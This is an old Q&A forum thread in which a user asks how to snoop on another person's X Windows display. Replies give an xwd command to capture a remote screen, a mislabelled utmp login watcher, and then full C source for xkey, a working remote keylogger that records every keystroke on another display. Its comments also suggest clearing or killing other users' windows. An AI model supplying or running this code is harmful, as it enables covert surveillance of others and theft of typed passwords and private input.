Snooping other windows in X-Windows.

Posted on 1997-06-01
Last Modified: 2013-12-26
Hi. How can I snoop another window?
In answer to my previos question dhm wrote : "There are ways to snoop on somebody else's window, but that's not what you
asked :-)". So, OK, now I'm asking , how can I snoop somebody else's window? Thanks for Your help.
Question by:dpodvaln
  • 2

Accepted Solution

leendert earned 250 total points
ID: 1293159


I know of two ways to snoop someone else's window. With
both these methods you will need access via
xhost +<your machines name> from the machine you'd like to
snoop. That is you will need to enter the command
xhost +<your machine's name> from the other person's machine
if the stuff mentioned underneath does not work.

Here are the two methods:

1) This one will bring back a snapshot of the other machines

   Here is the command :
   xwd -root -display machinename:0.0  | xwud

   where machinename is the name of the machine you'd like
   to take the snapshot from.

2) The second is a .c program with wich you can see exactly
   what keystrokes the other party uses. Compile it and run
   it with the display of the other machine as parameter.

      example : xtspy machinename:0.0

Here is the .c program :

#include <sys/types.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <utmp.h>

 * Defines to work around System V
#define bcopy(s1, s2, len) memcpy(s2, s1, len)
#define index(s, c) strchr(s, c)
#define rindex(s, c) strrchr(s, c)
#define bzero(s, len) memset(s, 0, len)
#define bcmp(s1, s2, len) (memcmp(s1, s2, len)!=0)
#define WAITIME 5

#define USIZ    (sizeof(struct utmp))

extern char *malloc ();
extern char *realloc ();
extern off_t lseek ();

static void
szprint (s, max)
char *s;
int max;
    /* catch the guy even if he puts esc. codes in ! */
    while (max-- && *s != '\0')
        if (isprint (*s))
            (void) fprintf (stderr, "%c", *s++);
            (void) fprintf (stderr, "(0x%X)", *s++);

static void
notify (old, new)
struct utmp *old;
struct utmp *new;
    char *op;
    struct utmp *u;

    u = new;
    op = "in";
    if (new->ut_name[0] == '\0')
        u = old;
        op = "out";

    szprint (u->ut_name, sizeof (u->ut_name));
    if (u->ut_line[0] != '\0')
        (void) fprintf (stderr, "@");
        szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, " (");
    szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, ") logged %s\n", op);

main ()
    time_t m_time;
    int utfd;
    struct utmp *up;
    struct utmp ubuf;
    int upsiz;
    struct stat sbuf;

    if (stat (UTMP_FILE, &sbuf) != 0 || (utfd = open (UTMP_FILE, O_RDONLY)) < 0)
        perror (UTMP_FILE);
        exit (1);
    m_time = sbuf.st_mtime;

    if ((up = (struct utmp *) malloc ((unsigned) sbuf.st_size)) == NULL)
        perror ("malloc utmp buffer");
        exit (1);
    upsiz = sbuf.st_size;

    if (read (utfd, (char *) up, (int) sbuf.st_size) != sbuf.st_size)
        (void) fprintf (stderr, "read %ld bytes from ", sbuf.st_size);
        perror (UTMP_FILE);
        exit (1);

    while (1)
        if (getppid () == 1)
            exit (0);

        (void) sleep (WAITIME);

        if (stat (UTMP_FILE, &sbuf) < 0)
            perror (UTMP_FILE);
            exit (1);

        if (upsiz < sbuf.st_size)
            up = (struct utmp *) realloc ((char *) up, (unsigned) sbuf.st_size);
            if (up == NULL)
                perror ("realloc utmp buffer");
                exit (1);
            upsiz = sbuf.st_size;

        if (sbuf.st_mtime != m_time)
            int i;

            if (lseek (utfd, 0L, 0) != 0L)

            for (i = 0; i < sbuf.st_size / USIZ; i++)
                if (read (utfd, (char *) &ubuf, USIZ) != USIZ)
                if (bcmp ((char *) &up[i], (char *) &ubuf, USIZ))
                    notify (&up[i], &ubuf);
                    (void) bcopy ((char *) &ubuf, (char *) &up[i], USIZ);
            m_time = sbuf.st_mtime;

Try the above. Hope this will solve your problem...


Expert Comment

ID: 1293160
Hi there,

I actually uploaded the wrong c file to snoop another
machines xwindows...

Here is the correct one. Sorry about that... :-}

 * To Compile, run it through gcc like
 * this :
 *    gcc -o xkey xkey.c -lX11 -lm
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *    Dominic Giampaolo (
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;


  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
     fprintf(stderr, "Can't query window tree...\n");

  if (nchildren == 0)

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
  XSelectInput(d, root, type);

  for(i=0; i < nchildren; i++)
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);

  XFree((char *)children);

void main(int argc, char **argv)
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL)
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

     XNextEvent(d, &xev);

     string = TranslateKeyCode(&xev);
     if (string == NULL)

     if (*string == '\r')
     else if (strlen(string) == 1)
       printf("%s", string);
       printf("<<%s>>", string);

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
  int count;
  char *tmp;
  KeySym ks;

  if (ev)
     count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
     key_buff[count] = '\0';

     if (count == 0)
        tmp = XKeysymToString(ks);
        if (tmp)
          strcpy(key_buff, tmp);
          strcpy(key_buff, "");

     return key_buff;
    return NULL;


This will help you out on your problem...


Featured Post

Free Tool: Site Down Detector

Helpful to verify reports of your own downtime, or to double check a downed website you are trying to access.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Folder Comparison 12 54
Host to IP 7 80
countEvens challenge 2 111
no14 challenge 14 70
In this article, I'll describe -- and show pictures of -- some of the significant additions that have been made available to programmers in the MFC Feature Pack for Visual C++ 2008.  These same feature are in the MFC libraries that come with Visual …
Introduction: The undo support, implementing a stack. Continuing from the eigth article about sudoku.   We need a mechanism to keep track of the digits entered so as to implement an undo mechanism.  This should be a ‘Last In First Out’ collec…
This video will show you how to get GIT to work in Eclipse.   It will walk you through how to install the EGit plugin in eclipse and how to checkout an existing repository.
Microsoft Active Directory, the widely used IT infrastructure, is known for its high risk of credential theft. The best way to test your Active Directory’s vulnerabilities to pass-the-ticket, pass-the-hash, privilege escalation, and malware attacks …

808 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question